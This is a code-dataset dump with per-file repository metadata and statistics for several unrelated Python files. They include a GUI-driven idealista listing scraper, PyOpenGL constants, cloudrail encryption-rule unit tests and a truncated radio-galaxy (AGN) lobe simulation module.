'https://www.idealista.com/alquiler-viviendas/barcelona/sant-andreu/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-marti/pagina-']
finurl = '.htm?ordenado-por=precios-asc'
Distrito_id = 0
raw_data = ''
status = 1
Excepcion_Distritos = ['sarria-sant-gervasi/','eixample/','ciutat-vella/']
#--------------------#
def auto_txt_save():
with open(nameDistrito[dis]+'.txt','a+',encoding="utf-8") as f:
f.write(str(raw_data) + '\n')
def tor_scrapper():
global raw_data
keyboard.press_and_release('ctrl+shift+i')
gui.sleep(0.5)
gui.click(1340,341)
time.sleep(0.5)
gui.click(button='right')
time.sleep(0.5)
gui.click(1399,577)
time.sleep(0.5)
gui.click(1679,586)
time.sleep(0.5)
raw_data = pyperclip.paste()
auto_txt_save()
keyboard.press_and_release('ctrl+shift+i')
for dis in range(len(Distritos)):
indent=1
status = 1
row = 0
while status == 1:
url=Distritos_links[dis]+str(indent)+finurl
pyperclip.copy(url)
time.sleep(3)
#gui.click(1018,1056)
time.sleep(3)
gui.click(95,195)
gui.click(492,65)
keyboard.press_and_release('ctrl+v, enter')
time.sleep(10)
#checks if new url is the same as the one pasted
gui.click(95,195) #clica en un sitio irrelevante
time.sleep(0.5)
gui.click(818,67, button='right')
time.sleep(0.5)
gui.click(845,126)
time.sleep(0.5)
check_url = pyperclip.paste()
if url == check_url:
print('Coinciden')
status = 1
else:
lowDistrito = Distritos[dis]
new_url = 'https://www.idealista.com/alquiler-viviendas/barcelona/'+ lowDistrito.lower() + '/?ordenado-por=precios-asc'
if check_url == new_url and row ==0:
print('Primera Página')
status = 1
row = 1
else:
status = 0
print(Distritos[dis]+' finished')
break
indent+=1
tor_scrapper()
| 62.601504
| 2,170
| 0.709945
| 1,080
| 8,326
| 5.45
| 0.178704
| 0.06524
| 0.138634
| 0.163099
| 0.743629
| 0.719504
| 0.692661
| 0.650527
| 0.634726
| 0.590214
| 0
| 0.013672
| 0.121547
| 8,326
| 132
| 2,171
| 63.075758
| 0.791086
| 0.02306
| 0
| 0.296875
| 0
| 0.25
| 0.616232
| 0.105215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.015625
| 0
| 0.046875
| 0.046875
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8f029031a6ad7ac81e7cd64df4a52189314a0813
| 190
|
py
|
Python
|
examples/python/ApiWeb/ApiWeb/config.py
|
austender/etender-ocds-api
|
ea3bd2fc212b092ce7b39c0bef579b9deae2d01e
|
[
"MIT"
] | 3
|
2021-03-30T03:16:14.000Z
|
2021-09-01T05:24:52.000Z
|
examples/python/ApiWeb/ApiWeb/config.py
|
austender/etender-ocds-api
|
ea3bd2fc212b092ce7b39c0bef579b9deae2d01e
|
[
"MIT"
] | 8
|
2019-11-01T02:46:55.000Z
|
2022-03-29T12:07:29.000Z
|
examples/python/ApiWeb/ApiWeb/config.py
|
austender/etender-ocds-api
|
ea3bd2fc212b092ce7b39c0bef579b9deae2d01e
|
[
"MIT"
] | 3
|
2019-03-21T02:22:25.000Z
|
2022-03-10T10:42:24.000Z
|
class Config:
Url_Search_By_CnId = "https://ocdsapi-dev.tenders.gov.au/ocds/findById/"
Url_Search_By_DateRange = "https://ocdsapi-dev.tenders.gov.au/ocds/findByDates/contractStart/"
| 47.5
| 98
| 0.768421
| 27
| 190
| 5.185185
| 0.62963
| 0.128571
| 0.157143
| 0.314286
| 0.442857
| 0.442857
| 0.442857
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 190
| 3
| 99
| 63.333333
| 0.804598
| 0
| 0
| 0
| 0
| 0
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
8f04cfae6dd3c8e06ac17cac7eb1930e302fe85d
| 816
|
py
|
Python
|
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/enhanced_layouts.py
|
JE-Chen/je_old_repo
|
a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5
|
[
"MIT"
] | null | null | null |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/enhanced_layouts.py
|
JE-Chen/je_old_repo
|
a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5
|
[
"MIT"
] | null | null | null |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/enhanced_layouts.py
|
JE-Chen/je_old_repo
|
a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5
|
[
"MIT"
] | null | null | null |
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_enhanced_layouts'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_enhanced_layouts',error_checker=_errors._error_checker)
GL_LOCATION_COMPONENT=_C('GL_LOCATION_COMPONENT',0x934A)
GL_TRANSFORM_FEEDBACK_BUFFER=_C('GL_TRANSFORM_FEEDBACK_BUFFER',0x8C8E)
GL_TRANSFORM_FEEDBACK_BUFFER_INDEX=_C('GL_TRANSFORM_FEEDBACK_BUFFER_INDEX',0x934B)
GL_TRANSFORM_FEEDBACK_BUFFER_STRIDE=_C('GL_TRANSFORM_FEEDBACK_BUFFER_STRIDE',0x934C)
| 42.947368
| 118
| 0.817402
| 119
| 816
| 5.168067
| 0.445378
| 0.107317
| 0.185366
| 0.243902
| 0.349594
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020492
| 0.102941
| 816
| 18
| 119
| 45.333333
| 0.819672
| 0.122549
| 0
| 0
| 1
| 0
| 0.237681
| 0.237681
| 0
| 0
| 0.034783
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.461538
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8f3dfcdfc3831b819b222c387259f8b9bc6ea6bc
| 290
|
py
|
Python
|
TensorFlow1.py
|
agbruneau/AGBPython
|
202e963b466dbee01139fdb26ace03343acdc9ca
|
[
"Apache-2.0"
] | null | null | null |
TensorFlow1.py
|
agbruneau/AGBPython
|
202e963b466dbee01139fdb26ace03343acdc9ca
|
[
"Apache-2.0"
] | null | null | null |
TensorFlow1.py
|
agbruneau/AGBPython
|
202e963b466dbee01139fdb26ace03343acdc9ca
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
edges = np.matrix('0 0 0 1; 0 0 1 0; 1 0 0 0; 0 0 1 0')
mat1 = np.matrix('0 0 0 0; 0 0 0 0; 0 0 0 0; 0 0 0 0')
for i in range(0,4):
for j in range(0,4):
if edges[i, j] == 1 or (edges[i, 0] == 1 and edges[0, j] == 1):
mat1[i, j] = 1
print(mat1)
| 24.166667
| 71
| 0.5
| 75
| 290
| 1.933333
| 0.253333
| 0.303448
| 0.372414
| 0.413793
| 0.303448
| 0.110345
| 0.110345
| 0.110345
| 0.110345
| 0.110345
| 0
| 0.230769
| 0.327586
| 290
| 11
| 72
| 26.363636
| 0.512821
| 0
| 0
| 0
| 0
| 0
| 0.234483
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0.125
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8f457344f7c13bd4e7e8efaf303ef86fcafeadd6
| 199
|
py
|
Python
|
tests/test_post_train_step.py
|
hankyul2/PostImageClassification
|
3a044f58f50a845d24a18225cee5aabf1af593ba
|
[
"MIT"
] | null | null | null |
tests/test_post_train_step.py
|
hankyul2/PostImageClassification
|
3a044f58f50a845d24a18225cee5aabf1af593ba
|
[
"MIT"
] | 2
|
2021-04-07T07:53:34.000Z
|
2021-04-07T07:57:10.000Z
|
tests/test_post_train_step.py
|
hankyul2/PostImageClassification
|
3a044f58f50a845d24a18225cee5aabf1af593ba
|
[
"MIT"
] | null | null | null |
from src.post_train_step import PostTrain
def test_train():
tool = PostTrain()
assert tool.train_fn()
def test_post_train():
tool = PostTrain()
assert tool.post_train() >= 0.8662
| 16.583333
| 41
| 0.688442
| 28
| 199
| 4.642857
| 0.5
| 0.207692
| 0.276923
| 0.369231
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031447
| 0.201005
| 199
| 11
| 42
| 18.090909
| 0.786164
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 0.428571
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8f5c671feb52927b8679a256b582d93bdfabdc1f
| 45
|
py
|
Python
|
Bot/3_Algorithm/Logic/_Dollar_Cost_Averaging.py
|
ReedGraff/High-Low
|
c8ba0339d7818e344cacf9a73a83d24dc539c2ca
|
[
"MIT"
] | 1
|
2022-01-06T05:50:53.000Z
|
2022-01-06T05:50:53.000Z
|
Bot/3_Algorithm/Logic/_Dollar_Cost_Averaging.py
|
ReedGraff/High-Low
|
c8ba0339d7818e344cacf9a73a83d24dc539c2ca
|
[
"MIT"
] | null | null | null |
Bot/3_Algorithm/Logic/_Dollar_Cost_Averaging.py
|
ReedGraff/High-Low
|
c8ba0339d7818e344cacf9a73a83d24dc539c2ca
|
[
"MIT"
] | null | null | null |
def Dollar_Cost_Averaging(self):
return 0
| 22.5
| 32
| 0.777778
| 7
| 45
| 4.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.155556
| 45
| 2
| 33
| 22.5
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
8f72e05aea2257fe19c04f05967166916f2c95b5
| 151
|
wsgi
|
Python
|
icanhaz/Centosimage/icanhaz.wsgi
|
technicalflow/docker
|
d5ba1ab3ad15823cbe6890754ca516a1a31eefeb
|
[
"MIT"
] | null | null | null |
icanhaz/Centosimage/icanhaz.wsgi
|
technicalflow/docker
|
d5ba1ab3ad15823cbe6890754ca516a1a31eefeb
|
[
"MIT"
] | 1
|
2021-12-07T18:48:59.000Z
|
2021-12-07T18:48:59.000Z
|
icanhaz/Centosimage/icanhaz.wsgi
|
technicalflow/docker
|
d5ba1ab3ad15823cbe6890754ca516a1a31eefeb
|
[
"MIT"
] | 1
|
2022-01-18T09:35:33.000Z
|
2022-01-18T09:35:33.000Z
|
import sys
import logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0, '/var/www/html/ip/icanhaz')
from icanhaz import app as application
| 25.166667
| 46
| 0.801325
| 24
| 151
| 5.041667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.086093
| 151
| 5
| 47
| 30.2
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0.15894
| 0.15894
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8f7a1b941746bc52e11d16a0fa451f8ac58d1f6a
| 4,121
|
py
|
Python
|
tests/knowledge/rules/aws/non_context_aware/encryption_enforcement_rules/encrypt_at_rest/test_ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
tests/knowledge/rules/aws/non_context_aware/encryption_enforcement_rules/encrypt_at_rest/test_ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
tests/knowledge/rules/aws/non_context_aware/encryption_enforcement_rules/encrypt_at_rest/test_ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
import unittest
from cloudrail.dev_tools.rule_test_utils import create_empty_entity
from cloudrail.knowledge.context.aws.kms.kms_key import KmsKey
from cloudrail.knowledge.context.aws.kms.kms_key_manager import KeyManager
from cloudrail.knowledge.context.aws.neptune.neptune_cluster import NeptuneCluster
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.context.terraform_state import TerraformState
from cloudrail.knowledge.rules.aws.non_context_aware.encryption_enforcement_rules.\
encrypt_at_rest.ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk import \
EnsureNeptuneClusterEncryptedAtRestWithCustomerManagedCmkRule
from cloudrail.knowledge.rules.base_rule import RuleResultType
class TestEnsureNeptuneClusterEncryptedAtRestWithCustomerManagedCmkRule(unittest.TestCase):
def setUp(self):
self.rule = EnsureNeptuneClusterEncryptedAtRestWithCustomerManagedCmkRule()
def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed_cmk_fail(self):
# Arrange
neptune_cluster: NeptuneCluster = create_empty_entity(NeptuneCluster)
terraform_state = create_empty_entity(TerraformState)
neptune_cluster.terraform_state = terraform_state
neptune_cluster.terraform_state.is_new = True
neptune_cluster.encrypted_at_rest = True
neptune_cluster.kms_data = KmsKey(key_id='key', arn='arn', key_manager=KeyManager.AWS, region='us-east-1', account='111111111')
context = AwsEnvironmentContext(neptune_clusters=[neptune_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.FAILED, result.status)
self.assertEqual(1, len(result.issues))
def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed_cmk_pass(self):
# Arrange
neptune_cluster: NeptuneCluster = create_empty_entity(NeptuneCluster)
terraform_state = create_empty_entity(TerraformState)
neptune_cluster.terraform_state = terraform_state
neptune_cluster.terraform_state.is_new = True
neptune_cluster.encrypted_at_rest = True
neptune_cluster.kms_data = KmsKey(key_id='key', arn='arn', key_manager=KeyManager.CUSTOMER, region='us-east-1', account='111111111')
context = AwsEnvironmentContext(neptune_clusters=[neptune_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.SUCCESS, result.status)
self.assertEqual(0, len(result.issues))
def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed__not_new_resource__cmk_pass(self):
# Arrange
neptune_cluster: NeptuneCluster = create_empty_entity(NeptuneCluster)
terraform_state = create_empty_entity(TerraformState)
neptune_cluster.terraform_state = terraform_state
neptune_cluster.terraform_state.is_new = False
neptune_cluster.encrypted_at_rest = True
neptune_cluster.kms_data = KmsKey(key_id='key', arn='arn', key_manager=KeyManager.AWS, region='us-east-1', account='111111111')
context = AwsEnvironmentContext(neptune_clusters=[neptune_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.SUCCESS, result.status)
self.assertEqual(0, len(result.issues))
def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed__no_kms_data__cmk_fail(self):
# Arrange
neptune_cluster: NeptuneCluster = create_empty_entity(NeptuneCluster)
terraform_state = create_empty_entity(TerraformState)
neptune_cluster.terraform_state = terraform_state
neptune_cluster.terraform_state.is_new = True
neptune_cluster.encrypted_at_rest = True
context = AwsEnvironmentContext(neptune_clusters=[neptune_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.FAILED, result.status)
self.assertEqual(1, len(result.issues))
| 53.519481
| 140
| 0.766562
| 465
| 4,121
| 6.434409
| 0.178495
| 0.135695
| 0.051136
| 0.074866
| 0.766377
| 0.735294
| 0.735294
| 0.735294
| 0.707888
| 0.707888
| 0
| 0.00981
| 0.158942
| 4,121
| 76
| 141
| 54.223684
| 0.853433
| 0.018199
| 0
| 0.649123
| 0
| 0
| 0.017853
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 1
| 0.087719
| false
| 0.035088
| 0.157895
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
56c841bfeca7d17c0c687b155ca31694f4940870
| 79
|
py
|
Python
|
script/commons/__init__.py
|
ybkuroki/selenium-e2e-sample
|
18a7e92d9b338104ac8b418a6987cadfd1c12d39
|
[
"MIT"
] | 1
|
2021-09-08T20:05:40.000Z
|
2021-09-08T20:05:40.000Z
|
script/commons/__init__.py
|
ybkuroki/selenium-e2e-sample
|
18a7e92d9b338104ac8b418a6987cadfd1c12d39
|
[
"MIT"
] | null | null | null |
script/commons/__init__.py
|
ybkuroki/selenium-e2e-sample
|
18a7e92d9b338104ac8b418a6987cadfd1c12d39
|
[
"MIT"
] | null | null | null |
from .stream_yaml import StreamYaml
from .resource_loader import ResourceLoader
| 39.5
| 43
| 0.886076
| 10
| 79
| 6.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088608
| 79
| 2
| 43
| 39.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
56d6133b0763cad627bffa7320e5ac2e310de3f1
| 26
|
py
|
Python
|
soda/core/soda/execution/telemetry.py
|
duyet/soda-core
|
92a52e0d7c1e88624d0637123cfcb2610af6d112
|
[
"Apache-2.0"
] | 4
|
2022-03-23T02:43:42.000Z
|
2022-03-31T15:20:54.000Z
|
soda/core/soda/execution/telemetry.py
|
duyet/soda-core
|
92a52e0d7c1e88624d0637123cfcb2610af6d112
|
[
"Apache-2.0"
] | 543
|
2022-03-22T09:02:17.000Z
|
2022-03-31T16:29:41.000Z
|
soda/core/soda/execution/telemetry.py
|
duyet/soda-core
|
92a52e0d7c1e88624d0637123cfcb2610af6d112
|
[
"Apache-2.0"
] | 1
|
2022-03-27T03:37:55.000Z
|
2022-03-27T03:37:55.000Z
|
class Telemetry:
pass
| 8.666667
| 16
| 0.692308
| 3
| 26
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.269231
| 26
| 2
| 17
| 13
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
710a5f3013dcbd02c8ceda5b65ef5d0194668901
| 1,164
|
py
|
Python
|
ixian_docker/tests/modules/bower/snapshots/snap_test_config.py
|
kreneskyp/ixian-docker
|
ce7a6cee2f961b8446dc3d9429a809ab5a235467
|
[
"Apache-2.0"
] | null | null | null |
ixian_docker/tests/modules/bower/snapshots/snap_test_config.py
|
kreneskyp/ixian-docker
|
ce7a6cee2f961b8446dc3d9429a809ab5a235467
|
[
"Apache-2.0"
] | null | null | null |
ixian_docker/tests/modules/bower/snapshots/snap_test_config.py
|
kreneskyp/ixian-docker
|
ce7a6cee2f961b8446dc3d9429a809ab5a235467
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from pysnap import Snapshot
snapshots = Snapshot()
snapshots['TestBowerConfig.test_read[ARGS] 1'] = [
'--config.interactive=false',
'--allow-root'
]
snapshots['TestBowerConfig.test_read[BIN] 1'] = '/srv/unittests/node_modules/.bin/bower'
snapshots['TestBowerConfig.test_read[COMPONENTS_DIR] 1'] = '/srv/unittests/bower_components'
snapshots['TestBowerConfig.test_read[CONFIG_FILE] 1'] = 'bower.json'
snapshots['TestBowerConfig.test_read[CONFIG_FILE_PATH] 1'] = '/srv/unittests/project/bower.json'
snapshots['TestBowerConfig.test_read[DOCKERFILE] 1'] = 'Dockerfile.bower'
snapshots['TestBowerConfig.test_read[IMAGE] 1'] = 'docker.io/library/unittests:bower-27a022922e73344c316d657ad99710548617005cf8886fb16139237a21bf4d4f'
snapshots['TestBowerConfig.test_read[IMAGE_TAG] 1'] = 'bower-27a022922e73344c316d657ad99710548617005cf8886fb16139237a21bf4d4f'
snapshots['TestBowerConfig.test_read[MODULE_DIR] 1'] = '/opt/ixian_docker/ixian_docker/modules/bower'
snapshots['TestBowerConfig.test_read[REPOSITORY] 1'] = 'docker.io/library/unittests'
| 36.375
| 150
| 0.787801
| 129
| 1,164
| 6.914729
| 0.387597
| 0.269058
| 0.313901
| 0.358744
| 0.568386
| 0.376682
| 0
| 0
| 0
| 0
| 0
| 0.102873
| 0.073024
| 1,164
| 31
| 151
| 37.548387
| 0.723818
| 0.053265
| 0
| 0
| 0
| 0
| 0.716106
| 0.66333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
713b38f89f89fcc7384a3684e9a19ccbd3668fd6
| 55
|
py
|
Python
|
src/pyfreedompro/__init__.py
|
stefano055415/pyfreedompro
|
efba39f8b97c1ece914652c256a6f7cdb6d052f0
|
[
"MIT"
] | null | null | null |
src/pyfreedompro/__init__.py
|
stefano055415/pyfreedompro
|
efba39f8b97c1ece914652c256a6f7cdb6d052f0
|
[
"MIT"
] | 1
|
2021-03-16T17:04:35.000Z
|
2021-03-17T12:50:19.000Z
|
src/pyfreedompro/__init__.py
|
stefano055415/pyfreedompro
|
efba39f8b97c1ece914652c256a6f7cdb6d052f0
|
[
"MIT"
] | 1
|
2021-03-16T15:25:40.000Z
|
2021-03-16T15:25:40.000Z
|
from .functions import get_list, get_states, put_state
| 27.5
| 54
| 0.836364
| 9
| 55
| 4.777778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109091
| 55
| 1
| 55
| 55
| 0.877551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8539f3c70da9670fd5fe800c409d4ac5a83502c3
| 9,820
|
py
|
Python
|
SimAGNReal.py
|
myinxd/FirstTry
|
167efa4f6a4ad3665b92b264af4d1fec5be968b0
|
[
"MIT"
] | null | null | null |
SimAGNReal.py
|
myinxd/FirstTry
|
167efa4f6a4ad3665b92b264af4d1fec5be968b0
|
[
"MIT"
] | null | null | null |
SimAGNReal.py
|
myinxd/FirstTry
|
167efa4f6a4ad3665b92b264af4d1fec5be968b0
|
[
"MIT"
] | 1
|
2020-03-02T04:34:04.000Z
|
2020-03-02T04:34:04.000Z
|
# Module name: SimAGN
# Class: Elp
# Class: Flux
# Functions
# 1. Calc_Tb
# 2. SimpleSim
# 3. GenMultiFRs
import numpy as np
import PIL.Image as Image
import pyfits
import matplotlib.pyplot as plt
# define Elliptical lobe and core class
class Elp:
def __init__(self):
self.Center = np.zeros((2,))
self.MajAxis = np.zeros((1,))
self.MinAxis = np.zeros((1,))
self.Angle = np.zeros((1,))
def save_as_dict(self):
Params = {'Center':self.Center,'MajAxis':self.MajAxis,
'MinAxis':self.MinAxis,'Angle':self.Angle}
return Params
def genCore(self,ImageMat,Param_Flux):
# preparing
Area = np.pi * self.MajAxis * self.MinAxis
Rows,Cols = ImageMat.shape
if self.MajAxis > self.MinAxis:
AxisMax = self.MajAxis
C_core = np.sqrt(self.MajAxis**2 - self.MinAxis**2)
# Focus1
F1_core_x = C_core
F1_core_y = 0
# Focus2
F2_core_x = -C_core
F2_core_y = 0
else:
AxisMax = self.MinAxis
C_core = np.sqrt(self.MinAxis**2 - self.MajAxis**2)
# Focus1
F1_core_x = 0
F1_core_y = C_core
# Focus2
F2_core_x = 0
F2_core_y = -C_core
# Fill with flux
# Intergerize
a = int(np.round(self.MajAxis))
b = int(np.round(self.MinAxis))
x = np.arange(-a,a+1,1)
y = np.arange(-b,b+1,1)
# Ellipse
for i in range(len(x)):
for j in range(len(y)):
DistFocus1 = np.sqrt((x[i]-F1_core_x)**2+(y[j]-F1_core_y)**2)
DistFocus2 = np.sqrt((x[i]-F2_core_x)**2+(y[j]-F2_core_y)**2)
if (DistFocus1+DistFocus2<=2*AxisMax):
x_r = x[i]*np.cos(self.Angle) - y[j]*np.sin(self.Angle)
y_r = x[i]*np.sin(self.Angle) + y[j]*np.cos(self.Angle)
x_r = int(round(x_r+self.Center[0]))
y_r = int(round(y_r+self.Center[1]))
# Judge and Fill
if (x_r>=1) and (x_r<=Cols) and (y_r>=1) and (y_r<=Rows):
ImageMat[y_r-1][x_r-1] = Param_Flux.Calc_Tb(Area,Flag=0)
return ImageMat
def genLobes(self,ImageMat,Param_Flux,CoreAng=np.pi/2,CoreCen=np.zeros((2,))):
# preparing
Area = np.pi * self.MajAxis * self.MinAxis
Rows,Cols = ImageMat.shape
# Lobe1
RotAng = self.Angle + CoreAng
CenDiff = [self.MajAxis * np.cos(self.Angle),self.MajAxis * np.sin(self.Angle)]
self.Center[0] = CoreCen[0]+CenDiff[0]*np.cos(CoreAng)-CenDiff[1]*np.sin(CoreAng)
self.Center[1] = CoreCen[1]+CenDiff[0]*np.sin(CoreAng)+CenDiff[1]*np.cos(CoreAng)
if self.MajAxis > self.MinAxis:
AxisMax = self.MajAxis
C_core = np.sqrt(self.MajAxis**2 - self.MinAxis**2)
# Focus1
F1_core_x = C_core
F1_core_y = 0
# Focus2
F2_core_x = -C_core
F2_core_y = 0
else:
AxisMax = self.MinAxis
C_core = np.sqrt(self.MinAxis**2 - self.MajAxis**2)
# Focus1
F1_core_x = 0
F1_core_y = C_core
# Focus2
F2_core_x = 0
F2_core_y = -C_core
a = int(np.round(self.MajAxis))
b = int(np.round(self.MinAxis))
x = np.arange(-a,a+1,1)
y = np.arange(-b,b+1,1)
# Ellipse
for i in range(len(x)):
for j in range(len(y)):
DistFocus1 = np.sqrt((x[i]-F1_core_x)**2+(y[j]-F1_core_y)**2)
DistFocus2 = np.sqrt((x[i]-F2_core_x)**2+(y[j]-F2_core_y)**2)
if (DistFocus1+DistFocus2<=2*AxisMax):
x_r = x[i]*np.cos(RotAng) - y[j]*np.sin(RotAng)
